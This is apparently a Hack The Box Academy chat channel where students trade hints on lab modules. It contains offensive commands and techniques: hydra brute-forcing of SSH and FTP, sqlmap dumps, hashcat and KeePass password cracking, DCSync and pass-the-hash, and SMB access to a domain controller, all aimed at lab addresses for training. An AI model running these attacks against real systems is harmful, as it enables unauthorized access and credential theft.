Right, now I understand the issue. I used !cat as it was supposed to be displaying the flag on the samba share, while it was just showing the flag inside the local directory I was running the smbclient from 🙂 thanks

!cat is used so you dont need to get out of example smb session. Cat flag would display the one in smb sess

Yep, makes sense now, thank you!

Hello guys
which is the best job role in the cybersecurity'

Thats just preference. Some ppl prefer jobs more into red teaming, some prefer defending or malware analysis etc.

the best is what you like the best

probably owner of the company

CISO?

I am stuck on suricata skill assessment. I need help on creating the suricata alert using the right keyword: alert tcp any any -> any any (msg:"WMI Execution Detected"; content:"Win32_ProcessStartup"; content:"powershell"; sid:2024233; rev:2;)

did you figure out how to fix this? having the same issue

Update Visual studio, worked for me. If not try reinstall. Im not sure why that happens

thanks

https://academy.hackthebox.com/module/details/253

new module - Active Directory Trust Attacks

@rapid sparrow I see you've done the CDSA and were stuck on the same question as me once; Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe may I bug you about how I might arrive at the solution :3

I forgot it... I didn't take any notes

So far I've done the steps using velociraptor and downloaded the SANS_TRIAGE Image

ohhh :P

pm

well if you remember even the slightest hint would help :3

it's just you and whatever tools you have on the target

scroll through the options in velociraptor and choose the ones that seem interesting

so no custom toolings required? I see the zimmerman suite of tools isnt present on the target either

Answer the questions below through Velociraptor collections that gather artifacts similar to the ones presented in this module.

ah I see, I'll try and figure it out

Hello, anyone completed the "Intro to Assembly Language" module?!

just ask your question

Could I dm you perchance? I'm really quite stuck nad if you took notes I see this as an opportunity for me to learn all this

I am kind of stuck in the "find the hex value in 'rax' when we reach the instruction at <_start+16>?" I try to follow the hint but seems I am doind something wrong

guys I am stuck here
hydra -l sam -P mut_password.list ssh://10.129.206.74

https://academy.hackthebox.com/module/147/section/1391

single step until that instruction, then look at the value of $rax

don't attack ssh

but wordlists have around 90k passwords
and if not ssh then what to use?

scan the target and see

I can only do 3 single steps... and then I get "Cannot find bound of current function" ...

ssh is brutally slow

I'm suffering the same fate

perhaps your gdb is in hex, in which case it's +10 for binary +16

okay then ftp
and what about password list
do I need to modify because it contains 90k words

use the mutated list

90k is normal, it'll take some time

you can use more threads as well

48 is most stable

-t 48 does well, took me around 20min to hit the pass

hydra -l sam -P mut_password.list ftp://10.129.206.74 -t 48

will it work?

it will take some time, but yes

~20 minutes

okay let me try

I can only step 2 times...

and I should step until start+16...

^

but I dont have anything in the start+10... no hex value

there is, look at rax

Im lost... I dont understand

you mean there is an hex value here_

yes, look at the rax register

not the instruction itself

that instruction is running an xor on the rax register. you need to look at the contents of the rax register itself

Im almos there

all i can really say is based on what you've learned in the module, you should choose options to get what you're looking for

Nw I got the answers! thank you tho

cool

i dont have access to my notes rn so sorry i couldnt help further

no worries! :))

@fathom pendant thank you so much
I got the pass

All I get from the info registers rax is "0x0"

well again you need to stop at the right instruction

read the question carefully and the "Step" paragraph

got it!!!!!

OMG...

thanks everyone!! I will have lots of struggles with this module hahahaha

just make sure to understand what's in the module

yes... I need to read it many times...

could someone please help with this question. Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.

the rest of the module is super easy

deleted

but i cant solve the first question its for DNS ENUMERUATION WITH PYTHON

have you tried the dig ANY query?

yea i can do it again thoguh 1 sec

or AXFR?

the module hasnt brung up axfr

this was my result with any a.root-servers.net. nstld.verisign-grs.com.****

you'd probably get better answers if you included what module you're working on

DNS ENUMERUATION WITH PYHTON MODULE 27

its the 1st question in DNS Records and Queries

Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.

what did u do to get all records?

for the domain?

we don't know what you're having trouble with so it's hard to answer still

you just presented a question in the module... like ok.. do what the module says?

or is it something specific?

ive used pretty much every command and tried all the answers and all these commandsA IP Version 4 Address records
AAAA IP Version 6 Address records
CNAME Canonical Name records
HINFO Host Information records
ISDN Integrated Services Digital Network records
MX Mail exchanger record
NS Name Server records
PTR Reverse-lookup Pointer records
SOA Start of Authority records
TXT

in the txt theirs a HTB flag but its for nothign in the module

Hello guys i'm new on that things about hacking and coding, i want to learn... someone can help me? Sorry if i'm ruing the conversation

it says submit the one unique record

in quotes

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

in all of hte records you get do you see a record that is unique

im gonna compile all the records i feel like might be the answer put them in notepad and go from their

Try this Flag as answer

iv tried 5+ times

the flag idk why its their but its also one of the only thing in quotes

Reload the Academy page in the browser and make sure that there are no spaces at the beginning or end

ok il try it again

so the txt is the unique record then and its bugged.?

Did anyone try the skill assesment of advanced sqlinjections? I feel like there is some minor version change in the postgres somwhere that breaks it

No, it is not bugged. It is correct

well atleast i know that the flag is the answer and im putting in wrong i guess

try inputting it without quotes

wow

❤️

it worked without the quotes

Tysm

ty aswell

what is the difference between a subdomain and host?

because a subdomain can also be a host record

i got the answer as of know it was the flag without the quotes

That's a great question. A subdomain and domain are both related, like app.example.com with example.com. app.example.com is a subdomain of the domain example.com. A host is the name of a specific computer or server on the network. For example, it reads like a subdomain sometimes, such as smtp.example.com. That could be an outgoing email server for the domain that reads just like a subdomain, but it's a host, a specific server

Put simply, a host is just a device within the network

yep, thx. I guess what i am saying is apart from the name of the subdomain, we don't have a way of telling whether we found a subdomain or a host without trying to enumerate the SOA or other records within the subdomain

so for example if i see smtp.domain.com A record it's likely a host

but if i see dev.domain.com A record could be a subdomain could be a single host within domain.com

it's not easy to tell at a glance

because vHost and ip based hosting

may be theres a host www.dev.domain.com and they put in dev.domain.com as an a record too

like a lot of websites put domain.com and www.domain.com pointing to same IP address in DNS

Apache vhosts

?

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

question in the DNS Enumeration section in Footprinting module

gonna try some different wordlists

but still against the subdomain i guess

subdomain of a subdomain

make sure you have the full list of subdomains from an axfr before attempting the dnsenum tool

hmmmm so i can use the dnsenum tool to enumerate hosts in a subdomain that i find

yep

but since i don't know which are actual subdomains that contain hosts i should just brute force everything that looks like a subdomain no?

Should I start. Introduction to Python 3 or Introduction to Bash Scripting

hard to answer, without knowing your objectives

Theirs no right answer my objective is to complete everything on hackthebox

going through all of level 1 rn

Yep

@trail flicker start with python3 then why not

Bet

i think i'm better using a bash for loop to enumerate hosts with dig rather than dnsenum. cos i can't force dnsenum to do just A record lookups

Il start the python 3 in a lil gotta couple things to do Thanks 🙂

I just went through that module. I tried both ways, the bash for loop and dnsenum. I got the answer with dnsenum, but the bash for loop did not work for me. Sometimes you have to use different tools on the same objective to get the result

thx

i just mention it because the bash loop seems to be more efficient than the dnsenum

because we just do a forward lookup each time

but dnsenum tryies to do the zone transfer and all that stuff first

Except dnsenum does more than axfr, which is why it doesn't work

Dnsenum is the tool to use

The for loop can be helpful, but you can make a for loop with dnsenum to check each subdomain you found though

dnsenum in lowercase

On mobile, first word is capitalized

yh thanks i was just checking i wasn't using the wrooong tool 🙂

in attacking coldfusion i do get a shell and when i type whoami or hostname and get a name and try to submit it i get false answer does anyone know how can i get the answer exactly? is it an error or what?

Maybe wrong wordlist, try a more fierce one with the right subdomain

marcie, how do you remember all those modules xD
do you carry your notes with you, even on mobile :D?

i forget what i have had for lunch sometimes xD

Probably has notes on phone

CPTS is the best course there is full stop

the pro lab dante is so so soso fun if youve taken good notes

nice mixture between whats known and a bit more thinking outside the box

absolutely fantastic. Just wanted to express this

Can someone please explain --no-cast to me for SQLMap?

sqlmap -u "http://94.237.53.3:40532/case7.php?id=1" --batch --dump --union-cols=5
did not work for case 7 in the questions

but
sqlmap -u "http://94.237.53.3:40532/case7.php?id=1" --batch --dump --union-cols=5 --no-cast
did work

I found this on some github page, but it still makes no sense. What does this have to do with the number of columns?!

I feel like this whole SQLMap module is just trial and error on what works with no rhyme or reason.

it instructs the tool not to use any casting function or equivalent mechanism when performing the injection test. the use of casting functions can alert IDS or trigger format-specific errors that can cause the payload delivery to fail.

I understand how the --union-cols=5 works though, because that was mentioned in the module

What do you mean by "casting function"?

casting refers to the use of sql functions to convert data from one type to another

Am I correct in saying the --no-cast switch should be in my bag of "try it if nothing else works"?

So, for example, HTTP encoding?!

for example, if the SQL injection point is in a numerical context, sqlmap might use casting to ensure that the injected SQL code remains valid and executable by the database server

Is there a good way to find out if it's needed, or just blind trial and error?

I don't quite understand. Does it keep it from being HTTP encoded or something?

no

What is it trying to accomplish at a database level?

Sorry, the module doesn't go into much detail

I went back through every section of the module and couldn't find it again. I think it may have been in one of the hints.

sql queries are structed to handle specific data types in different parts of the query, like numeric data is expected in some conditions while strings are expected in others. sqlmap automatically tries to detect and adapt the data type requirements of the query. the no cast option stops sqlmap from trying to adapt the payloads to match the data type requirements of the sql injection points through casting functions.

sometimes the automatic casting that sqlmap performs may not work as intended because it misinterprets the data context or because the db handles type conversions in some unusual way

Okay, that makes sense. So in this case, the columns are kept as numeric. Why would the command without --no-cast not work though?! I would assume it tries numeric values first for the --union-cols= value first

Are you saying that it's taking the --union-cols=5 and using something non-numeric in place of the 5 without using the --no-cast switch?

Seems to me like an anomaly.

'why would the command without no cast not work' -- again because sqlmap can misinterpret the data and do things that mess up the query, or the db does something that messes up the query

So it's safe to say use --no-cast on anything where I'm specifying a specific value for a switch then. Makes sense.

yeah if you have precise knowledge of the data type of the column and are confident about your formatting then no cast can simplify it and avoid potential errors due to sqlmap misinterpreting the data

really comes down to expirimentation and knowledge of the target

Cool, thank you for the explanation!

Yeah, I really wish this was covered more in this section, or at least somewhere in the module.

Attacking Common Services, Hard

i have problems forming a working query, what am i doing wrong?

i have impersonated j... in sqlcmd and found the local linked server, now trying to execute commands with the sysadmin privs but i dont get a feedback from my query

im using double single quotes

looks right to me, dm me and i'll take a look

<@&861185840277487616>

<@&861185840277487616>

The pathetic thing is he’s typing it himself, it’s not even a bot

What an idiot you are

<@&861185840277487616> ban this psycho

maybe don't say it.

A ban with id: 2499 already exists for member acvoaasr1#0

Neato

Most of those words shouldve been purged

That issue is now fixed

thank you

It seems we had every variation of it

but not the actual word 😂

Sorry for that mess

just some child trying to be edgy on the internet, not your fault

Fk i missed it

be glad you did

what happened xD?

as i can remember there are 2 modules that are no longer on the repository when trying to install with pip or apt, it been a minute

For anyone else who has any issues connecting to the target via RDP in the Windows Privilege Escalation - Windows Server module; I think this is an issue with the fact that it is a 2k8 box and doesnt like how xfreerdp is interacting with it. I have found there are no issues if you instead use rdesktop (sudo apt install rdesktop) which was built with and used with legacy systems

yo what is the bst attack plan tactic is there website where u can see ?

we don't offer any hacking services

you awnt to get hacked?

im joking

can someone help i used ssh dynaomic port forwarding and then proxychains nmap and then it says all the hosts are opened for my nmap scan but thats a lie?

no one here is going to give you any hacks

Completed Parallel DNS resolution of 3 hosts. at 16:19, 0.01s elapsed
Nmap scan report for 172.16.0.0
Host is up (0.078s latency).
Nmap scan report for 172.16.0.1
Host is up (3.1s latency).
Nmap scan report for 172.16.0.2
Host is up (3.1s latency).
why does namp say all the hosts are opened

Opened isn't the right word

What is your command

proxychains nmap -v -sn 172.16.0.0-2 00

i used dynamic port forwarding with ssh

Last login: Wed Feb 21 08:13:15 2024
webadmin@inlanefreight:~$ channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host

Hello, is someone here w ysoserial experience? i've been trying to work on something but for some reason ysoserial wont accept the command and deem it something w error w command usage

network inet 172.16.5.15 netmask 255.255.0.0 network ip shud be 172.16.0.0 ? dats what i scanned

You should wrap your content in backticks

So it formats better

ok sorry

nmap

What is your question?

why doesnt nmap work? it says all hosts up for the full network scan

i used dynamic port forwarding ssh 9080 then edited proxychains sock4 9080 then proxychains nmap that cmd and then it scans all and says all online

Those are weird flags for nmapping something when combined with port forwarding

why thats what module is

Maybe reset the module and try out the commands again to verify you didn't miss something

i c ok danke

Now I'm trying to solve the hard lab on password attacks module.I get the password for 'johanna' and I logged in using evil-winrm and transfer the file L****.kdbx into my machine and crack it and get the password, I tried to use this password for user 'david' but It doesn't work, it tells me it's a wrong password, what should I do next ?

any help please ?

I'm stuck here, I got the password for user david , when I'm trying to use these creds with smbclient I got, authentication failure

I created a topic in this link, any help would be appreciated

https://forum.hackthebox.com/t/password-attacks-hard-lab/311608

Pivoting, Tunneling, and Port Forwarding

Page 16
Skills Assessment

Skills Assessment
the last device on pivoting wont ever start why

the .25

i reset that thang like 50 times

bruh wtf why wont it work

i rdped into the .35 using that username and pw then i do ping sweep and just no new ips

the DC ip wont load

i get .35 .15 but not .25 why wont this server load

Check the interfaces on .35, make sure the other octets are correct for .25

any help with this please ?

o danke

Password Attacks Lab - Hard

I got the password for user Johanna → 1*******!
I logged in using evil-winrm, then download the file L****.kdbx into my pwnbox
I cracked this file and got a password → Q*******
When I’m trying to use this password with user david into smbclient it gives me authentication faliure

I’m stuck here what should I do next ?

Dm the password you have and the command you're using

Sometimes you just need to slow down and wait a bit 😉

Iirc 15 or 20 is the magic number when you do find it

theres two NICs but same network ip do i have to change anything for my ping sweep cmd? for /L %i in (1 1 254) do ping 172.16.10.%i -n 5 -w 100 | find "Reply" ?

Are they the same?

same network ip and submask yes

different NIC ips tho

one was like 6.25 otherone was like 10.6 but its within the network 10.16.0.0

i dont need to change anything right with the ping sweep since it will jsut use its routing tbale

because that's not D* pw

that PW is for the PW manager

that wasn't an invitation to DM me @west ledge

you can log into rdp with J*

from there it should become clearer

Hey, y'all I got a question.
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01.
I am currently on MS01, I did the dcsync of the t**ty user and got hashes, when I performed pth though, I am still on MS01 - meaning I did the dcsync wrong in some way as I didn't obtain admin hash for DC01.
Is there a perimeter that I forgot to add?

Where he is correct according to my notes

Unless my notes are wrong

unless his explanation skipped signing into the PW DB

(which is what you cracked for)

you cracked the master pw db password

pth with minm doesn't get you a remote shell, it just opens a terminal with the user you pth with on the same host

I tried this and I get stuck, what should I do with the password after cracking the Logins.kdbx file

Do I have to do tunnleing and pivoting...X-X

brother, what 2john did you use to convert it. that would be your answer

if it's just a flag you can access it over smb from ms01, but it's always better to pivot

there's a password database/manager

I used keepass2john

Omg, I overlooked a step, Marcie is correct

so there's your password manager (without the 2john) on the machine

it's just the flag on the desktop..so uh...you are telling me I can somehow use smb to access the desktop.

I doubt it's in a share, but I will try.

Ok thanks, I will try this one now

Which area can you ask general HTB academy questions - not specific to a module but pertaining to VPN and accessing the academy from the same machine.

with admin you can access the entire file system as long as smb is open

\\DC01\C$

oh you meant the ls and then the...

got it

you can still ask here, if it's academy related you can ask here

Ok I'm asking - I seem to lose access to the academy website content when I start the vpn - I'm guessing its not intended to be use that way? I'd like to cut down the amount of machines I'm cutting and pasting between.

I'd recommend practicing your pivoting tho, you'll need it for the next SA anyways

it's not intended; it's a common Kali issue though

https://askubuntu.com/questions/913112/how-to-toggle-networkmanagers-use-this-connection-only-for-resources-on-its-ne

something like this maybe

I'm using parrot on a VM locally. Is there a way of modifying the VPN that people use?

nope

it's just your network settings for w/e reason making the tun0 the default connection even though it shouldn't

yeah, I will.

the vpn pack is a split-tunnel meaning it shouldn't affect your network traffic

I have to re-view how to pivot without SSH.

Thank you I'll look into

the article i linked should resolve the issue

It works nicely - not an exact article but close enough to get it to work. Thank you!

close enough to lead you to what you need 👍

I'm at the point where I have the user tom on htb academy's footprinting hard lab
and I have the username and password I am supposed to log in as:

┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-4d1e3vlqyg]─[~]
└──╼ [★]$ braa backup@10.129.47.90:.*

but its asking me for ser's password and the assignment doesn't say anything about ser
why is this? the username and password I get from the braa scan and 'ser' aren't compatible.

wdym 'ser' it sounds like you're trying to ssh/login incorrectly

Hey guys!
Currently working on “introduction to digital forensics - rapid triage examination and analysis tools”
Stuck for several days on first question. Can I have some help?

I solved problem nevermind

Zone.Identifier never changes

Can I dm you?

sorry bro it's bed time

just know that the Zone.Identifier data never changes

Okay, thank you anyway!

I'm working on the passwd, shadow, and opasswd section from the password attacks module...

I grabbed the hash from the account under Will's .backup directory, but hashcat isn't cracking it...

hashcat -a 0 -m 1800 hash.txt ~/Documents/Seclists/wordlists/rockyou.txt -o ~/Desktop/cracked.txt

don't paste the full thing

Any ideas as to what I'm doing wrong?

you don't gotta paste the full hash dude

as it's a spoiler still

I figured maybe someone could double-check it for me. Sorry.

try using the mutated wordlist

With the hash...?

yes

you frequently reuse the mutated wordlist in this module

They used rockyou.txt in the example.

has anyone done the intro to whitebox pentesting?

in order of checks: it's passwd.list -> mutated_password.list -> rockyou

and that's just as an example

start with given resources

then branch out